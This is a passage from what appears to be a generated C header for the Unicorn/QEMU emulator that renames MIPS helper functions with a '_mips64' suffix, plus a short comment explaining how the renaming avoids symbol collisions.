helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips64 #define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips64 #define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips64 #define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips64 #define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips64 #define helper_mtc0_hwrena helper_mtc0_hwrena_mips64 #define helper_mtc0_count helper_mtc0_count_mips64 #define helper_mtc0_saari helper_mtc0_saari_mips64 #define helper_mtc0_saar helper_mtc0_saar_mips64 #define helper_mthc0_saar helper_mthc0_saar_mips64 #define helper_mtc0_entryhi helper_mtc0_entryhi_mips64 #define helper_mttc0_entryhi helper_mttc0_entryhi_mips64 #define helper_mtc0_compare helper_mtc0_compare_mips64 #define helper_mtc0_status helper_mtc0_status_mips64 #define helper_mttc0_status helper_mttc0_status_mips64 #define helper_mtc0_intctl helper_mtc0_intctl_mips64 #define helper_mtc0_srsctl helper_mtc0_srsctl_mips64 #define helper_mtc0_cause helper_mtc0_cause_mips64 #define helper_mttc0_cause helper_mttc0_cause_mips64 #define helper_mftc0_epc helper_mftc0_epc_mips64 #define helper_mftc0_ebase helper_mftc0_ebase_mips64 #define helper_mtc0_ebase helper_mtc0_ebase_mips64 #define helper_mttc0_ebase helper_mttc0_ebase_mips64 #define helper_mftc0_configx helper_mftc0_configx_mips64 #define helper_mtc0_config0 helper_mtc0_config0_mips64 #define helper_mtc0_config2 helper_mtc0_config2_mips64 #define helper_mtc0_config3 helper_mtc0_config3_mips64 #define helper_mtc0_config4 helper_mtc0_config4_mips64 #define helper_mtc0_config5 helper_mtc0_config5_mips64 #define helper_mtc0_lladdr helper_mtc0_lladdr_mips64 #define helper_mtc0_maar helper_mtc0_maar_mips64 #define helper_mthc0_maar helper_mthc0_maar_mips64 #define helper_mtc0_maari helper_mtc0_maari_mips64 #define helper_mtc0_watchlo helper_mtc0_watchlo_mips64 #define helper_mtc0_watchhi helper_mtc0_watchhi_mips64 #define helper_mthc0_watchhi helper_mthc0_watchhi_mips64 #define helper_mtc0_xcontext helper_mtc0_xcontext_mips64 #define helper_mtc0_framemask helper_mtc0_framemask_mips64 #define helper_mtc0_debug helper_mtc0_debug_mips64 #define helper_mttc0_debug helper_mttc0_debug_mips64 #define helper_mtc0_performance0 helper_mtc0_performance0_mips64 #define helper_mtc0_errctl helper_mtc0_errctl_mips64 
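/*
 * Each `#define old old_mips64` entry in this generated header renames one of
 * QEMU's global symbols with a per-target suffix, which lets Unicorn link
 * several architecture cores into a single library without duplicate-symbol
 * collisions. A minimal sketch of the mechanism follows; the helper name in it
 * is hypothetical and not part of the real mapping:
 */
#if 0 /* illustration only -- excluded from compilation */
#define helper_do_work helper_do_work_mips64 /* the preprocessor renames every use */
void helper_do_work(int x); /* so the object file actually exports helper_do_work_mips64 */
#endif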
#define helper_mtc0_taglo helper_mtc0_taglo_mips64 #define helper_mtc0_datalo helper_mtc0_datalo_mips64 #define helper_mtc0_taghi helper_mtc0_taghi_mips64 #define helper_mtc0_datahi helper_mtc0_datahi_mips64 #define helper_mftgpr helper_mftgpr_mips64 #define helper_mftlo helper_mftlo_mips64 #define helper_mfthi helper_mfthi_mips64 #define helper_mftacx helper_mftacx_mips64 #define helper_mftdsp helper_mftdsp_mips64 #define helper_mttgpr helper_mttgpr_mips64 #define helper_mttlo helper_mttlo_mips64 #define helper_mtthi helper_mtthi_mips64 #define helper_mttacx helper_mttacx_mips64 #define helper_mttdsp helper_mttdsp_mips64 #define helper_dmt helper_dmt_mips64 #define helper_emt helper_emt_mips64 #define helper_dvpe helper_dvpe_mips64 #define helper_evpe helper_evpe_mips64 #define helper_dvp helper_dvp_mips64 #define helper_evp helper_evp_mips64 #define cpu_mips_get_random cpu_mips_get_random_mips64 #define cpu_mips_init cpu_mips_init_mips64 #define helper_absq_s_ph helper_absq_s_ph_mips64 #define helper_absq_s_qb helper_absq_s_qb_mips64 #define helper_absq_s_w helper_absq_s_w_mips64 #define helper_absq_s_ob helper_absq_s_ob_mips64 #define helper_absq_s_qh helper_absq_s_qh_mips64 #define helper_absq_s_pw helper_absq_s_pw_mips64 #define helper_addqh_ph helper_addqh_ph_mips64 #define helper_addqh_r_ph helper_addqh_r_ph_mips64 #define helper_addqh_r_w helper_addqh_r_w_mips64 #define helper_addqh_w helper_addqh_w_mips64 #define helper_adduh_qb helper_adduh_qb_mips64 #define helper_adduh_r_qb helper_adduh_r_qb_mips64 #define helper_subqh_ph helper_subqh_ph_mips64 #define helper_subqh_r_ph helper_subqh_r_ph_mips64 #define helper_subqh_r_w helper_subqh_r_w_mips64 #define helper_subqh_w helper_subqh_w_mips64 #define helper_addq_ph helper_addq_ph_mips64 #define helper_addq_s_ph helper_addq_s_ph_mips64 #define helper_addq_s_w helper_addq_s_w_mips64 #define helper_addu_ph helper_addu_ph_mips64 #define helper_addu_qb helper_addu_qb_mips64 #define helper_addu_s_ph helper_addu_s_ph_mips64 #define helper_addu_s_qb helper_addu_s_qb_mips64 #define helper_subq_ph helper_subq_ph_mips64 #define helper_subq_s_ph helper_subq_s_ph_mips64 #define helper_subq_s_w helper_subq_s_w_mips64 #define helper_subu_ph helper_subu_ph_mips64 #define helper_subu_qb helper_subu_qb_mips64 #define helper_subu_s_ph helper_subu_s_ph_mips64 #define helper_subu_s_qb helper_subu_s_qb_mips64 #define helper_adduh_ob helper_adduh_ob_mips64 #define helper_adduh_r_ob helper_adduh_r_ob_mips64 #define helper_subuh_ob helper_subuh_ob_mips64 #define helper_subuh_r_ob helper_subuh_r_ob_mips64 #define helper_addq_pw helper_addq_pw_mips64 #define helper_addq_qh helper_addq_qh_mips64 #define helper_addq_s_pw helper_addq_s_pw_mips64 #define helper_addq_s_qh helper_addq_s_qh_mips64 #define helper_addu_ob helper_addu_ob_mips64 #define helper_addu_qh helper_addu_qh_mips64 #define helper_addu_s_ob helper_addu_s_ob_mips64 #define helper_addu_s_qh helper_addu_s_qh_mips64 #define helper_subq_pw helper_subq_pw_mips64 #define helper_subq_qh helper_subq_qh_mips64 #define helper_subq_s_pw helper_subq_s_pw_mips64 #define helper_subq_s_qh helper_subq_s_qh_mips64 #define helper_subu_ob helper_subu_ob_mips64 #define helper_subu_qh helper_subu_qh_mips64 #define helper_subu_s_ob helper_subu_s_ob_mips64 #define helper_subu_s_qh helper_subu_s_qh_mips64 #define helper_subuh_qb helper_subuh_qb_mips64 #define helper_subuh_r_qb helper_subuh_r_qb_mips64 #define helper_addsc helper_addsc_mips64 #define helper_addwc helper_addwc_mips64 #define helper_modsub 
helper_modsub_mips64 #define helper_raddu_w_qb helper_raddu_w_qb_mips64 #define helper_raddu_l_ob helper_raddu_l_ob_mips64 #define helper_precr_qb_ph helper_precr_qb_ph_mips64 #define helper_precrq_qb_ph helper_precrq_qb_ph_mips64 #define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips64 #define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips64 #define helper_precrq_ph_w helper_precrq_ph_w_mips64 #define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips64 #define helper_precr_ob_qh helper_precr_ob_qh_mips64 #define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips64 #define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips64 #define helper_precrq_ob_qh helper_precrq_ob_qh_mips64 #define helper_precrq_qh_pw helper_precrq_qh_pw_mips64 #define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips64 #define helper_precrq_pw_l helper_precrq_pw_l_mips64 #define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mips64 #define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips64 #define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips64 #define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips64 #define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips64 #define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips64 #define helper_precequ_ph_qbl helper_precequ_ph_qbl_mips64 #define helper_precequ_ph_qbr helper_precequ_ph_qbr_mips64 #define helper_precequ_ph_qbla helper_precequ_ph_qbla_mips64 #define helper_precequ_ph_qbra helper_precequ_ph_qbra_mips64 #define helper_precequ_qh_obl helper_precequ_qh_obl_mips64 #define helper_precequ_qh_obr helper_precequ_qh_obr_mips64 #define helper_precequ_qh_obla helper_precequ_qh_obla_mips64 #define helper_precequ_qh_obra helper_precequ_qh_obra_mips64 #define helper_preceu_ph_qbl helper_preceu_ph_qbl_mips64 #define helper_preceu_ph_qbr helper_preceu_ph_qbr_mips64 #define helper_preceu_ph_qbla helper_preceu_ph_qbla_mips64 #define helper_preceu_ph_qbra helper_preceu_ph_qbra_mips64 #define helper_preceu_qh_obl helper_preceu_qh_obl_mips64 #define helper_preceu_qh_obr helper_preceu_qh_obr_mips64 #define helper_preceu_qh_obla helper_preceu_qh_obla_mips64 #define helper_preceu_qh_obra helper_preceu_qh_obra_mips64 #define helper_shll_qb helper_shll_qb_mips64 #define helper_shrl_qb helper_shrl_qb_mips64 #define helper_shra_qb helper_shra_qb_mips64 #define helper_shra_r_qb helper_shra_r_qb_mips64 #define helper_shll_ob helper_shll_ob_mips64 #define helper_shrl_ob helper_shrl_ob_mips64 #define helper_shra_ob helper_shra_ob_mips64 #define helper_shra_r_ob helper_shra_r_ob_mips64 #define helper_shll_ph helper_shll_ph_mips64 #define helper_shll_s_ph helper_shll_s_ph_mips64 #define helper_shll_qh helper_shll_qh_mips64 #define helper_shll_s_qh helper_shll_s_qh_mips64 #define helper_shrl_qh helper_shrl_qh_mips64 #define helper_shra_qh helper_shra_qh_mips64 #define helper_shra_r_qh helper_shra_r_qh_mips64 #define helper_shll_s_w helper_shll_s_w_mips64 #define helper_shra_r_w helper_shra_r_w_mips64 #define helper_shll_pw helper_shll_pw_mips64 #define helper_shll_s_pw helper_shll_s_pw_mips64 #define helper_shra_pw helper_shra_pw_mips64 #define helper_shra_r_pw helper_shra_r_pw_mips64 #define helper_shrl_ph helper_shrl_ph_mips64 #define helper_shra_ph helper_shra_ph_mips64 #define helper_shra_r_ph helper_shra_r_ph_mips64 #define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mips64 #define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mips64 #define helper_mulq_rs_ph helper_mulq_rs_ph_mips64 #define helper_mul_ph helper_mul_ph_mips64 #define helper_mul_s_ph helper_mul_s_ph_mips64 #define 
helper_mulq_s_ph helper_mulq_s_ph_mips64 #define helper_muleq_s_w_phl helper_muleq_s_w_phl_mips64 #define helper_muleq_s_w_phr helper_muleq_s_w_phr_mips64 #define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mips64 #define helper_mulsa_w_ph helper_mulsa_w_ph_mips64 #define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips64 #define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips64 #define helper_mulq_rs_qh helper_mulq_rs_qh_mips64 #define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips64 #define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips64 #define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips64 #define helper_dpau_h_qbl helper_dpau_h_qbl_mips64 #define helper_dpau_h_qbr helper_dpau_h_qbr_mips64 #define helper_dpsu_h_qbl helper_dpsu_h_qbl_mips64 #define helper_dpsu_h_qbr helper_dpsu_h_qbr_mips64 #define helper_dpau_h_obl helper_dpau_h_obl_mips64 #define helper_dpau_h_obr helper_dpau_h_obr_mips64 #define helper_dpsu_h_obl helper_dpsu_h_obl_mips64 #define helper_dpsu_h_obr helper_dpsu_h_obr_mips64 #define helper_dpa_w_ph helper_dpa_w_ph_mips64 #define helper_dpax_w_ph helper_dpax_w_ph_mips64 #define helper_dps_w_ph helper_dps_w_ph_mips64 #define helper_dpsx_w_ph helper_dpsx_w_ph_mips64 #define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mips64 #define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mips64 #define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mips64 #define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mips64 #define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mips64 #define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mips64 #define helper_dpa_w_qh helper_dpa_w_qh_mips64 #define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips64 #define helper_dps_w_qh helper_dps_w_qh_mips64 #define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips64 #define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mips64 #define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mips64 #define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips64 #define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips64 #define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips64 #define helper_maq_s_w_phl helper_maq_s_w_phl_mips64 #define helper_maq_s_w_phr helper_maq_s_w_phr_mips64 #define helper_maq_sa_w_phl helper_maq_sa_w_phl_mips64 #define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips64 #define helper_mulq_s_w helper_mulq_s_w_mips64 #define helper_mulq_rs_w helper_mulq_rs_w_mips64 #define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips64 #define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips64 #define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips64 #define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips64 #define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips64 #define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips64 #define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips64 #define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips64 #define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips64 #define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips64 #define helper_dmadd helper_dmadd_mips64 #define helper_dmaddu helper_dmaddu_mips64 #define helper_dmsub helper_dmsub_mips64 #define helper_dmsubu helper_dmsubu_mips64 #define helper_bitrev helper_bitrev_mips64 #define helper_insv helper_insv_mips64 #define helper_dinsv helper_dinsv_mips64 #define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips64 #define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips64 #define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips64 #define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips64 #define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips64 #define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips64 #define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips64 #define 
helper_cmpu_lt_qb helper_cmpu_lt_qb_mips64 #define helper_cmpu_le_qb helper_cmpu_le_qb_mips64 #define helper_cmp_eq_ph helper_cmp_eq_ph_mips64 #define helper_cmp_lt_ph helper_cmp_lt_ph_mips64 #define helper_cmp_le_ph helper_cmp_le_ph_mips64 #define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips64 #define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips64 #define helper_cmpu_le_ob helper_cmpu_le_ob_mips64 #define helper_cmp_eq_qh helper_cmp_eq_qh_mips64 #define helper_cmp_lt_qh helper_cmp_lt_qh_mips64 #define helper_cmp_le_qh helper_cmp_le_qh_mips64 #define helper_cmp_eq_pw helper_cmp_eq_pw_mips64 #define helper_cmp_lt_pw helper_cmp_lt_pw_mips64 #define helper_cmp_le_pw helper_cmp_le_pw_mips64 #define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips64 #define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips64 #define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips64 #define helper_pick_qb helper_pick_qb_mips64 #define helper_pick_ph helper_pick_ph_mips64 #define helper_pick_ob helper_pick_ob_mips64 #define helper_pick_qh helper_pick_qh_mips64 #define helper_pick_pw helper_pick_pw_mips64 #define helper_packrl_ph helper_packrl_ph_mips64 #define helper_packrl_pw helper_packrl_pw_mips64 #define helper_extr_w helper_extr_w_mips64 #define helper_extr_r_w helper_extr_r_w_mips64 #define helper_extr_rs_w helper_extr_rs_w_mips64 #define helper_dextr_w helper_dextr_w_mips64 #define helper_dextr_r_w helper_dextr_r_w_mips64 #define helper_dextr_rs_w helper_dextr_rs_w_mips64 #define helper_dextr_l helper_dextr_l_mips64 #define helper_dextr_r_l helper_dextr_r_l_mips64 #define helper_dextr_rs_l helper_dextr_rs_l_mips64 #define helper_extr_s_h helper_extr_s_h_mips64 #define helper_dextr_s_h helper_dextr_s_h_mips64 #define helper_extp helper_extp_mips64 #define helper_extpdp helper_extpdp_mips64 #define helper_dextp helper_dextp_mips64 #define helper_dextpdp helper_dextpdp_mips64 #define helper_shilo helper_shilo_mips64 #define helper_dshilo helper_dshilo_mips64 #define helper_mthlip helper_mthlip_mips64 #define helper_dmthlip helper_dmthlip_mips64 #define cpu_wrdsp cpu_wrdsp_mips64 #define helper_wrdsp helper_wrdsp_mips64 #define cpu_rddsp cpu_rddsp_mips64 #define helper_rddsp helper_rddsp_mips64 #define helper_cfc1 helper_cfc1_mips64 #define helper_ctc1 helper_ctc1_mips64 #define ieee_ex_to_mips ieee_ex_to_mips_mips64 #define helper_float_sqrt_d helper_float_sqrt_d_mips64 #define helper_float_sqrt_s helper_float_sqrt_s_mips64 #define helper_float_cvtd_s helper_float_cvtd_s_mips64 #define helper_float_cvtd_w helper_float_cvtd_w_mips64 #define helper_float_cvtd_l helper_float_cvtd_l_mips64 #define helper_float_cvt_l_d helper_float_cvt_l_d_mips64 #define helper_float_cvt_l_s helper_float_cvt_l_s_mips64 #define helper_float_cvtps_pw helper_float_cvtps_pw_mips64 #define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips64 #define helper_float_cvts_d helper_float_cvts_d_mips64 #define helper_float_cvts_w helper_float_cvts_w_mips64 #define helper_float_cvts_l helper_float_cvts_l_mips64 #define helper_float_cvts_pl helper_float_cvts_pl_mips64 #define helper_float_cvts_pu helper_float_cvts_pu_mips64 #define helper_float_cvt_w_s helper_float_cvt_w_s_mips64 #define helper_float_cvt_w_d helper_float_cvt_w_d_mips64 #define helper_float_round_l_d helper_float_round_l_d_mips64 #define helper_float_round_l_s helper_float_round_l_s_mips64 #define helper_float_round_w_d helper_float_round_w_d_mips64 #define helper_float_round_w_s helper_float_round_w_s_mips64 #define helper_float_trunc_l_d helper_float_trunc_l_d_mips64 #define helper_float_trunc_l_s 
helper_float_trunc_l_s_mips64 #define helper_float_trunc_w_d helper_float_trunc_w_d_mips64 #define helper_float_trunc_w_s helper_float_trunc_w_s_mips64 #define helper_float_ceil_l_d helper_float_ceil_l_d_mips64 #define helper_float_ceil_l_s helper_float_ceil_l_s_mips64 #define helper_float_ceil_w_d helper_float_ceil_w_d_mips64 #define helper_float_ceil_w_s helper_float_ceil_w_s_mips64 #define helper_float_floor_l_d helper_float_floor_l_d_mips64 #define helper_float_floor_l_s helper_float_floor_l_s_mips64 #define helper_float_floor_w_d helper_float_floor_w_d_mips64 #define helper_float_floor_w_s helper_float_floor_w_s_mips64 #define helper_float_cvt_2008_l_d helper_float_cvt_2008_l_d_mips64 #define helper_float_cvt_2008_l_s helper_float_cvt_2008_l_s_mips64 #define helper_float_cvt_2008_w_d helper_float_cvt_2008_w_d_mips64 #define helper_float_cvt_2008_w_s helper_float_cvt_2008_w_s_mips64 #define helper_float_round_2008_l_d helper_float_round_2008_l_d_mips64 #define helper_float_round_2008_l_s helper_float_round_2008_l_s_mips64 #define helper_float_round_2008_w_d helper_float_round_2008_w_d_mips64 #define helper_float_round_2008_w_s helper_float_round_2008_w_s_mips64 #define helper_float_trunc_2008_l_d helper_float_trunc_2008_l_d_mips64 #define helper_float_trunc_2008_l_s helper_float_trunc_2008_l_s_mips64 #define helper_float_trunc_2008_w_d helper_float_trunc_2008_w_d_mips64 #define helper_float_trunc_2008_w_s helper_float_trunc_2008_w_s_mips64 #define helper_float_ceil_2008_l_d helper_float_ceil_2008_l_d_mips64 #define helper_float_ceil_2008_l_s helper_float_ceil_2008_l_s_mips64 #define helper_float_ceil_2008_w_d helper_float_ceil_2008_w_d_mips64 #define helper_float_ceil_2008_w_s helper_float_ceil_2008_w_s_mips64 #define helper_float_floor_2008_l_d helper_float_floor_2008_l_d_mips64 #define helper_float_floor_2008_l_s helper_float_floor_2008_l_s_mips64 #define helper_float_floor_2008_w_d helper_float_floor_2008_w_d_mips64 #define helper_float_floor_2008_w_s helper_float_floor_2008_w_s_mips64 #define helper_float_abs_d helper_float_abs_d_mips64 #define helper_float_abs_s helper_float_abs_s_mips64 #define helper_float_abs_ps helper_float_abs_ps_mips64 #define helper_float_chs_d helper_float_chs_d_mips64 #define helper_float_chs_s helper_float_chs_s_mips64 #define helper_float_chs_ps helper_float_chs_ps_mips64 #define helper_float_recip_d helper_float_recip_d_mips64 #define helper_float_recip_s helper_float_recip_s_mips64 #define helper_float_rsqrt_d helper_float_rsqrt_d_mips64 #define helper_float_rsqrt_s helper_float_rsqrt_s_mips64 #define helper_float_recip1_d helper_float_recip1_d_mips64 #define helper_float_recip1_s helper_float_recip1_s_mips64 #define helper_float_recip1_ps helper_float_recip1_ps_mips64 #define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips64 #define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips64 #define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips64 #define helper_float_rint_s helper_float_rint_s_mips64 #define helper_float_rint_d helper_float_rint_d_mips64 #define float_class_s float_class_s_mips64 #define helper_float_class_s helper_float_class_s_mips64 #define float_class_d float_class_d_mips64 #define helper_float_class_d helper_float_class_d_mips64 #define helper_float_add_d helper_float_add_d_mips64 #define helper_float_add_s helper_float_add_s_mips64 #define helper_float_add_ps helper_float_add_ps_mips64 #define helper_float_sub_d helper_float_sub_d_mips64 #define helper_float_sub_s helper_float_sub_s_mips64 #define helper_float_sub_ps 
helper_float_sub_ps_mips64 #define helper_float_mul_d helper_float_mul_d_mips64 #define helper_float_mul_s helper_float_mul_s_mips64 #define helper_float_mul_ps helper_float_mul_ps_mips64 #define helper_float_div_d helper_float_div_d_mips64 #define helper_float_div_s helper_float_div_s_mips64 #define helper_float_div_ps helper_float_div_ps_mips64 #define helper_float_recip2_d helper_float_recip2_d_mips64 #define helper_float_recip2_s helper_float_recip2_s_mips64 #define helper_float_recip2_ps helper_float_recip2_ps_mips64 #define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips64 #define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips64 #define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips64 #define helper_float_addr_ps helper_float_addr_ps_mips64 #define helper_float_mulr_ps helper_float_mulr_ps_mips64 #define helper_float_max_s helper_float_max_s_mips64 #define helper_float_max_d helper_float_max_d_mips64 #define helper_float_maxa_s helper_float_maxa_s_mips64 #define helper_float_maxa_d helper_float_maxa_d_mips64 #define helper_float_min_s helper_float_min_s_mips64 #define helper_float_min_d helper_float_min_d_mips64 #define helper_float_mina_s helper_float_mina_s_mips64 #define helper_float_mina_d helper_float_mina_d_mips64 #define helper_float_madd_d helper_float_madd_d_mips64 #define helper_float_madd_s helper_float_madd_s_mips64 #define helper_float_madd_ps helper_float_madd_ps_mips64 #define helper_float_msub_d helper_float_msub_d_mips64 #define helper_float_msub_s helper_float_msub_s_mips64 #define helper_float_msub_ps helper_float_msub_ps_mips64 #define helper_float_nmadd_d helper_float_nmadd_d_mips64 #define helper_float_nmadd_s helper_float_nmadd_s_mips64 #define helper_float_nmadd_ps helper_float_nmadd_ps_mips64 #define helper_float_nmsub_d helper_float_nmsub_d_mips64 #define helper_float_nmsub_s helper_float_nmsub_s_mips64 #define helper_float_nmsub_ps helper_float_nmsub_ps_mips64 #define helper_float_maddf_s helper_float_maddf_s_mips64 #define helper_float_maddf_d helper_float_maddf_d_mips64 #define helper_float_msubf_s helper_float_msubf_s_mips64 #define helper_float_msubf_d helper_float_msubf_d_mips64 #define helper_cmp_d_f helper_cmp_d_f_mips64 #define helper_cmpabs_d_f helper_cmpabs_d_f_mips64 #define helper_cmp_d_un helper_cmp_d_un_mips64 #define helper_cmpabs_d_un helper_cmpabs_d_un_mips64 #define helper_cmp_d_eq helper_cmp_d_eq_mips64 #define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips64 #define helper_cmp_d_ueq helper_cmp_d_ueq_mips64 #define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips64 #define helper_cmp_d_olt helper_cmp_d_olt_mips64 #define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips64 #define helper_cmp_d_ult helper_cmp_d_ult_mips64 #define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips64 #define helper_cmp_d_ole helper_cmp_d_ole_mips64 #define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips64 #define helper_cmp_d_ule helper_cmp_d_ule_mips64 #define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips64 #define helper_cmp_d_sf helper_cmp_d_sf_mips64 #define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips64 #define helper_cmp_d_ngle helper_cmp_d_ngle_mips64 #define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips64 #define helper_cmp_d_seq helper_cmp_d_seq_mips64 #define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips64 #define helper_cmp_d_ngl helper_cmp_d_ngl_mips64 #define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips64 #define helper_cmp_d_lt helper_cmp_d_lt_mips64 #define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips64 #define helper_cmp_d_nge helper_cmp_d_nge_mips64 #define 
helper_cmpabs_d_nge helper_cmpabs_d_nge_mips64 #define helper_cmp_d_le helper_cmp_d_le_mips64 #define helper_cmpabs_d_le helper_cmpabs_d_le_mips64 #define helper_cmp_d_ngt helper_cmp_d_ngt_mips64 #define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips64 #define helper_cmp_s_f helper_cmp_s_f_mips64 #define helper_cmpabs_s_f helper_cmpabs_s_f_mips64 #define helper_cmp_s_un helper_cmp_s_un_mips64 #define helper_cmpabs_s_un helper_cmpabs_s_un_mips64 #define helper_cmp_s_eq helper_cmp_s_eq_mips64 #define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips64 #define helper_cmp_s_ueq helper_cmp_s_ueq_mips64 #define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips64 #define helper_cmp_s_olt helper_cmp_s_olt_mips64 #define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips64 #define helper_cmp_s_ult helper_cmp_s_ult_mips64 #define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips64 #define helper_cmp_s_ole helper_cmp_s_ole_mips64 #define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips64 #define helper_cmp_s_ule helper_cmp_s_ule_mips64 #define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips64 #define helper_cmp_s_sf helper_cmp_s_sf_mips64 #define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips64 #define helper_cmp_s_ngle helper_cmp_s_ngle_mips64 #define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips64 #define helper_cmp_s_seq helper_cmp_s_seq_mips64 #define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips64 #define helper_cmp_s_ngl helper_cmp_s_ngl_mips64 #define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips64 #define helper_cmp_s_lt helper_cmp_s_lt_mips64 #define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips64 #define helper_cmp_s_nge helper_cmp_s_nge_mips64 #define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips64 #define helper_cmp_s_le helper_cmp_s_le_mips64 #define helper_cmpabs_s_le helper_cmpabs_s_le_mips64 #define helper_cmp_s_ngt helper_cmp_s_ngt_mips64 #define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips64 #define helper_cmp_ps_f helper_cmp_ps_f_mips64 #define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips64 #define helper_cmp_ps_un helper_cmp_ps_un_mips64 #define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips64 #define helper_cmp_ps_eq helper_cmp_ps_eq_mips64 #define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips64 #define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips64 #define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips64 #define helper_cmp_ps_olt helper_cmp_ps_olt_mips64 #define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips64 #define helper_cmp_ps_ult helper_cmp_ps_ult_mips64 #define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips64 #define helper_cmp_ps_ole helper_cmp_ps_ole_mips64 #define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips64 #define helper_cmp_ps_ule helper_cmp_ps_ule_mips64 #define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips64 #define helper_cmp_ps_sf helper_cmp_ps_sf_mips64 #define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips64 #define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips64 #define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips64 #define helper_cmp_ps_seq helper_cmp_ps_seq_mips64 #define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips64 #define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips64 #define helper_cmpabs_ps_ngl 